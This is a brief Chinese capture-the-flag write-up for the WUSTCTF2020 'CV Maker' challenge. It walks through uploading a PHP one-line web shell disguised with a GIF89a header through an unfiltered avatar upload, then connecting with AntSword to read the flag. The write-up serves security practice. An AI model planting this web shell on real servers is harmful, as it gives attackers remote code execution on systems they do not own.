[WUSTCTF2020]CV Maker

[WUSTCTF2020]CV Maker

1.进去后看到有注册页面，先注册一个账号

2.登入后，直接放了一个明显的上传头像，怀疑是uploadloud

3.先看看有没有过滤，直接就传了个带后门的php文件

GIF89a  

<script language='php'>@eval($_POST['hhz']);</script>

4.然后就上传成功了（没有过滤，大大滴好评）没有看到回显，然后看了下源码发现路径回显再这里了

 

5.蚁剑连接后根目录找到flag